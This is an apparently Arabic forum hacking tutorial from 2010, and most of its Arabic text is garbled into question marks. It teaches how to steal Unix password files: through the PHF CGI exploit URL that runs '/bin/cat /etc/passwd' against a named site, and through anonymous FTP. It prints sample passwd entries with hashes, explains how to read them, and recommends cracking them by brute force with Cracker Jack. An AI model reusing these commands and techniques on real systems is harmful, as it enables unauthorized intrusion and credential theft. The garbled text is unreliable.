????? ??????? ???? ??? ?? ???? ? ??? ???? ???? ?? ???? ????? ??? ?? ????? ??? ???? ??????? ?????? ??? ????? ?? ???? ??????? ?????? ?????? ?? ???? ????? ???????? ???????? ??? ? ????? ??????? ???? ??? ??? ???? ???? ?????? ????? ????? ??????? ???? ???? ?????? ????? ??? ??? ?? ??? ?????? ??? ???? ??????? ???????? ???? ?? ?????? ?????? ???? ?????? ??? ????????? ?? ???? ????? ?? ???? ?? ?????? ???? ?? ??? ?????? ??????? ???? ??????? ?? ????? ???? ???? ?? ?????? ? ???? ??? ????? ?? ?????? ????? ?? ??????? ?????? ????? ??????? ??????? ??? ????? ???? ?? ??????? ,,,
??????? ??? ????? ?? ????????? ???? ?????? ??? ???? ??????? ?? ???? ??? ?? ??? ???? ????? ????
???? ???? ?????? ??????
www.kondor.com ???? ???? ??? ????? ?? ?? ???? ?? ?????? ???? ?? ?? ???? ???? ?? ????? ??? ??????
???? ????? ??? ????? ????? ???? ??? ??? ??????? ???? ??? ???? ??? ??? ?????? ??? ????? ?? ?????? ??????? ???? ??
hgguutujfkerh@kondor.com ??? ?????? ??? ????? ?? ?????? ????? ???? ?????? ??? ? ?? ???? ??????? ???? ????? ???????? ????? ?????? ??? ??? ????? ?????? ?????? ?? ?????? ??? ???? ?????? ? ???? ????? ?? ?????
????? ???? ???? ???? ????? ???? ??????? ???? ?????? ?? ???? ?? ??????? ??
////////////
////////////
?????? ????
////////////
////////////
?? ????? ??? ??????? ????? ????? ??? ???? ??????? ? ?? ???? ??? ??????? ??????? ???? ??? ????? ?? ?? ?? ??? ?????? ???? ??? ???????? ?????? ????? ?? passwd ????? ????? ??? ??? ?? ??????? WWWThreads ?????????
/////////////////////////////////////////////////
????? ??? ??? ????? ????? ???? ????? ????? ???? ????? ????? ????? ????? ??? ????? ? ????? ??? ???? ?????? ??? ????? ??????? ??? ???????? ???? ??? ?? ???? ??????? ??? ?? ???? ??????? ??????? ??? ?? ????? ??? ???? ??? ???? ??? ???? ????? .. ??? ? ?? ??? ???? ??? ??????? ????? ???? ???? ????
???? ???? ??? ??????? ?? ??? ??????
anonymously (( ?????? ?????? ?? ??? ?????? ))
????? ??? ?????? ?????? ??
etc
????? ?????
passwd
?? ???? ... ?? ????? ????? ???? ?? ! ????? ????? ??? ??? ???? ?????? ??????? ?????? ?????????? ??????? ???????? ?????? ???? ??????? ?????? ???? ?????
????? ???? ??????? ??? ????? ?? ?????????
???? ?? ?????? ???????? ?? ???? ??????? ?? ?? ??? ???? ?? ?? ??
??? ????? ???? ????? ??????
cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
???? ????? ?????? ??
www.kondor.com ???? ????
www.kondor.com/cgi-bin/phf?Qalias=x/bin/cat /etc/passwd
????? ??? ???? ?? ?????
passwd
???? ???? ?? ????? ????? ?????? ???? ?????? ??? ???? ??????? ???? ?? ???? ??? ????? ????? ???? ?? ?????? ???? ??? ???? ?????? ????? ??? ??????? ?? ????? ???? ??? ????? ?????? ????? ?? ???????? ???? ??? ??? ?? ????? !
???? ??? ??? ????? ?????? ????? ?????
?: ?? ?????
passwd
??? ?????? ????? ????? ?? ??????? ??????? ????? ?
?: ?????
passwd
????? ????? ???? ?????? ?????????? ??????? ??? ???? ???? ??????? ??? ??? ????? ????? ???? ???? ????? ???? ????? ????? ?? ?????? ??? ???? ???? ???? ? ????? ??? ????? ??? ????? ??? ????? ????? ??? ???? ????
Sources Code - ????
root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
???? ????? ?? ????? ???
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
???????? ???? ???
??? ???????? ??
kondor
????? ???? ??????? .. ?? ???? ??? ???? ????? ??
yu&rte6745kd
?????
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
???? ????? ??? ???? ????? ??? ????? ?? ????? passwd
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
????? ?? ???? ?? ??? ??
admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
? : ?? ?? ???? ???? ?
? : ?? ???? ? ???? ?? ???? ????? ??? ?? ??? ?????? ???? ???? ????? ??? ???? ?? ???? ?? ???? ??????? ?????? ??? ???? ?????? ??? ??????? ?? ??? ????? ? ??? ??? ????????? ???? ?? ??????
???? ?????? alsahat.net ???? ??? ???? ?????
??? ???? ????? ?? ??? ?????
? : ?? ????? ????? ???? ???? ?? ???? ???? ?
? : ??? ?? ???? ...
? : ?? ???? ????? ????? ?????? ???? ??? ???? ?
? : ??? ? ???? ??????? ?????? ???? ????? ??????? ?????? (passwd) ????? ????? ?? Brute ???? ????? ??? ?? ????? ???? ????? ?????? ??? ?? ???? ???? ?? ????? ??? Cracker Jack 1.4
)(
??????? ?? ??? ????? ?? ????
)(
??? ?????? ????? ?? ???? ... ???? ??? ???? ???? ??? ????? ???? ??????? ???? ??? ??? ???? ?????
???? ???????? ???? ?? ????
?? ???? ???? ?????? ??? ??? ????? ??? ???? ??? ???? ?????? :: ??? ??? :: ???
=== ????? ?? ??? ????? ===
????? ?? ?????
(??? ????? ?? ???? ???? ??? ???????? )passwd file
????? ??? ????? ?????????? ?????? ??? ?????? ??? ??????? ???????? ?????? ?????? ???? ???? ????? ???? ?? ?? ?????? ?? ?????? ??? ??? ???????? ????? ???? ??? ??????? ?? ??????? ??? ????? ?????
???? ?? ???? ??? ,,,, ????
??????? ???????
???? ?? ?? ??????? ,,, ??????? ?? ??? ?????? ?? ????? ??? ??? ????? ?? ??? ?? ?????? ??? ????????? ?? ??? ??????? ?? ???? ??? ??????
?? ??? ??? ??????? ? ???? ??? ??????? ??? ?? ??? ?????? ??? ?? ????? ???? ?? ?? ??????????? ??????? ??????
www.kondor.com????? ???? ???? ??????
???? ??? ?????? ??????? ??
PHF
????? ????????? ????? ??? ?????? ???? ???? ?? ??? ????? ?? ????? (??? ??? ???? ?? ?? ?? ??? ) !:! ??? ???? ??? ?????? ???? ???? ?? ??? ???????? ? ?? ??? ????
Sources Code - ????
root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
??? ????? ????? (????? ?????? ???? ????? ???? ) ?????
???? ????? ?? ???? ?? ????? ?? ???? ???? ?? ?????? ???? ???????
FTP Passwd
??? ????????? ???? ??? ???????? ?? ???? ?? ?? ???? ? ?? ?????? ??? ?? ???? ?? ???? ??? ??? ???????? ?? ???? ????? ?? ??? ????
anonymous logins
??????? ?????? ????? ?? ?????? ? ????? ??? ???????? ?? ????? ?????? ? ?????? ??? ??? ??????? ???? ???
WS FTP or CuteFTP
???? ?????? ?????? ????? ??? ???? ???? ?? ?????
???? ????
etc
???? ???? ?? ??? ???? ?? ??????? ??? ???
"group, passwd"
???? ???????? ?? ??? ???? ????
passwd
???? ???? ??? ??? .. ????? ??? ????? ?????? ??? ??? ??? ???
"root, daemon, FTP, nobody, ftplogin, bin"
???? ???? ?????? ?? ??? ??????? ??? ???? ???? * ??? ??? ??? ??? ????? ??? ??? ? ?? ????? ????????? ???? ??????? ???? ?? ?????? ?? ????? ???????? ???? ?? ???? ??? ???? ??????? ???? ??? ???? ??? ??? ???
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
????? ????? ???? ??????? ???? ???? ???? ?? ???? ?? ???? ??????? ???? ?????? ?? ?????
? : ???? ??? ??????? ??? ????? ???? ???? ??????? ?
???? ??? .... !:!
?????? ???? ????????
???? ???? ?? ???? ??? ??? ???
"joetest:*:102:100::/home/joetest:/usr/bin/restsh"
???? ???? ????
shadowed passwd
???? ????? ?? ???? ??????? ???? ???
passwd file
????? (?? ???? ????? ???? ) ??????
passwd file
?? ???? ??? ???? ???? ??? ????? ????? ??? ???? ??? * ?? x
? ???
shadow file
???? ???? ???? ???? ???? ?? ???
???? ??? ???? ??? ????? ?? ??? ??????
الإثنين سبتمبر 27, 2010 1:26 pm